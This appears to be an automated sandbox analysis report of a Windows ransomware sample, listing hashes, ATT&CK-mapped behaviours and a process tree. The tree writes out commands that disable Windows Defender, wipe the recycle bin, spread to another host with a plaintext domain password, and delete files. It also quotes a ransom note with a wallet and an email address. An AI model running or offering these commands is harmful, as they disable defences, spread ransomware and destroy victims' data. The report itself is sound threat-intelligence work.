cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787

Resubmissions

11/01/2024, 13:59 UTC

240111-ractvahbep 10

09/01/2024, 17:33 UTC

240109-v46wkagba2 10

Analysis

max time kernel
128s
max time network
146s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
11/01/2024, 13:59 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Size

87KB
MD5

d6d956267a268c9dcf48445629d2803e
SHA1

cc0feae505dad9c140dd21d1b40b518d8e61b3a4
SHA256

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
SHA512

e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee
SSDEEP

1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral11/memory/3580-0-0x00000000004B0000-0x00000000004CC000-memory.dmp	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Blocklisted process makes network request 3 IoCs

flow	pid	Process
17	5788	mshta.exe
19	5788	mshta.exe
21	5788	mshta.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Executes dropped EXE 1 IoCs

pid	Process
6712	qccqkdcc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\njosephnull@secmail.pro\r\n"	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4836	sc.exe
4104	sc.exe
4868	sc.exe
4900	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
3904	vssadmin.exe
4340	vssadmin.exe
3276	vssadmin.exe
3204	vssadmin.exe
5076	vssadmin.exe
516	vssadmin.exe
4744	vssadmin.exe
1648	vssadmin.exe
3688	vssadmin.exe
1788	vssadmin.exe
3908	vssadmin.exe
768	vssadmin.exe
2852	vssadmin.exe
352	vssadmin.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4796	taskkill.exe
312	taskkill.exe
560	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6868	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
220	powershell.exe
220	powershell.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
220	powershell.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeIncreaseQuotaPrivilege	220	powershell.exe
Token: SeSecurityPrivilege	220	powershell.exe
Token: SeTakeOwnershipPrivilege	220	powershell.exe
Token: SeLoadDriverPrivilege	220	powershell.exe
Token: SeSystemProfilePrivilege	220	powershell.exe
Token: SeSystemtimePrivilege	220	powershell.exe
Token: SeProfSingleProcessPrivilege	220	powershell.exe
Token: SeIncBasePriorityPrivilege	220	powershell.exe
Token: SeCreatePagefilePrivilege	220	powershell.exe
Token: SeBackupPrivilege	220	powershell.exe
Token: SeRestorePrivilege	220	powershell.exe
Token: SeShutdownPrivilege	220	powershell.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeSystemEnvironmentPrivilege	220	powershell.exe
Token: SeRemoteShutdownPrivilege	220	powershell.exe
Token: SeUndockPrivilege	220	powershell.exe
Token: SeManageVolumePrivilege	220	powershell.exe
Token: 33	220	powershell.exe
Token: 34	220	powershell.exe
Token: 35	220	powershell.exe
Token: 36	220	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	3516	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeIncreaseQuotaPrivilege	2256	powershell.exe
Token: SeSecurityPrivilege	2256	powershell.exe
Token: SeTakeOwnershipPrivilege	2256	powershell.exe
Token: SeLoadDriverPrivilege	2256	powershell.exe
Token: SeSystemProfilePrivilege	2256	powershell.exe
Token: SeSystemtimePrivilege	2256	powershell.exe
Token: SeProfSingleProcessPrivilege	2256	powershell.exe
Token: SeIncBasePriorityPrivilege	2256	powershell.exe
Token: SeCreatePagefilePrivilege	2256	powershell.exe
Token: SeBackupPrivilege	2256	powershell.exe
Token: SeRestorePrivilege	2256	powershell.exe
Token: SeShutdownPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeSystemEnvironmentPrivilege	2256	powershell.exe
Token: SeRemoteShutdownPrivilege	2256	powershell.exe
Token: SeUndockPrivilege	2256	powershell.exe
Token: SeManageVolumePrivilege	2256	powershell.exe
Token: 33	2256	powershell.exe
Token: 34	2256	powershell.exe
Token: 35	2256	powershell.exe
Token: 36	2256	powershell.exe
Token: SeIncreaseQuotaPrivilege	1380	powershell.exe
Token: SeSecurityPrivilege	1380	powershell.exe
Token: SeTakeOwnershipPrivilege	1380	powershell.exe
Token: SeLoadDriverPrivilege	1380	powershell.exe
Token: SeSystemProfilePrivilege	1380	powershell.exe
Token: SeSystemtimePrivilege	1380	powershell.exe
Token: SeProfSingleProcessPrivilege	1380	powershell.exe
Token: SeIncBasePriorityPrivilege	1380	powershell.exe
Token: SeCreatePagefilePrivilege	1380	powershell.exe
Token: SeBackupPrivilege	1380	powershell.exe
Token: SeRestorePrivilege	1380	powershell.exe
Token: SeShutdownPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeSystemEnvironmentPrivilege	1380	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3580 wrote to memory of 220	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	73
PID 3580 wrote to memory of 220	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	73
PID 3580 wrote to memory of 1588	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	86
PID 3580 wrote to memory of 1588	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	86
PID 3580 wrote to memory of 1380	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	76
PID 3580 wrote to memory of 1380	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	76
PID 3580 wrote to memory of 3516	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	77
PID 3580 wrote to memory of 3516	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	77
PID 3580 wrote to memory of 2256	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	84
PID 3580 wrote to memory of 2256	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	84
PID 3580 wrote to memory of 2096	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	82
PID 3580 wrote to memory of 2096	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	82
PID 3580 wrote to memory of 3708	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	81
PID 3580 wrote to memory of 3708	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	81
PID 3580 wrote to memory of 168	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	87
PID 3580 wrote to memory of 168	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	87
PID 3580 wrote to memory of 1868	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	89
PID 3580 wrote to memory of 1868	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	89
PID 3580 wrote to memory of 364	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	91
PID 3580 wrote to memory of 364	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	91
PID 3580 wrote to memory of 2940	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	92
PID 3580 wrote to memory of 2940	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	92
PID 3580 wrote to memory of 4784	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	95
PID 3580 wrote to memory of 4784	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	95
PID 3580 wrote to memory of 2120	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	96
PID 3580 wrote to memory of 2120	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	96
PID 3580 wrote to memory of 2416	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	266
PID 3580 wrote to memory of 2416	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	266
PID 3580 wrote to memory of 2412	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	265
PID 3580 wrote to memory of 2412	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	265
PID 3580 wrote to memory of 1624	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	264
PID 3580 wrote to memory of 1624	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	264
PID 3580 wrote to memory of 4604	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	263
PID 3580 wrote to memory of 4604	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	263
PID 3580 wrote to memory of 2364	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	262
PID 3580 wrote to memory of 2364	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	262
PID 3580 wrote to memory of 3912	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	261
PID 3580 wrote to memory of 3912	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	261
PID 3580 wrote to memory of 2348	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	260
PID 3580 wrote to memory of 2348	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	260
PID 3580 wrote to memory of 3164	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	259
PID 3580 wrote to memory of 3164	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	259
PID 3580 wrote to memory of 2948	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	258
PID 3580 wrote to memory of 2948	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	258
PID 3580 wrote to memory of 512	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	257
PID 3580 wrote to memory of 512	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	257
PID 3580 wrote to memory of 1804	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	256
PID 3580 wrote to memory of 1804	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	256
PID 3580 wrote to memory of 4708	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	255
PID 3580 wrote to memory of 4708	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	255
PID 3580 wrote to memory of 368	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	254
PID 3580 wrote to memory of 368	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	254
PID 3580 wrote to memory of 1572	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	253
PID 3580 wrote to memory of 1572	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	253
PID 3580 wrote to memory of 4640	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	252
PID 3580 wrote to memory of 4640	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	252
PID 3580 wrote to memory of 3352	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	251
PID 3580 wrote to memory of 3352	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	251
PID 3580 wrote to memory of 2016	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	250
PID 3580 wrote to memory of 2016	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	250
PID 3580 wrote to memory of 3368	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	249
PID 3580 wrote to memory of 3368	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	249
PID 3580 wrote to memory of 4136	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	248
PID 3580 wrote to memory of 4136	3580	c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe	248

C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
"C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:168
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  PID:1868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:2940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:2120
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:2792
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.127.0.112 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:7128
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  PID:1948
- C:\Users\Admin\AppData\Local\Temp\qccqkdcc.exe
  "C:\Users\Admin\AppData\Local\Temp\qccqkdcc.exe" \10.127.0.112 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
  2⤵
  - Executes dropped EXE
  PID:6712
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:5788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
  2⤵
  PID:5868
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:6196
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
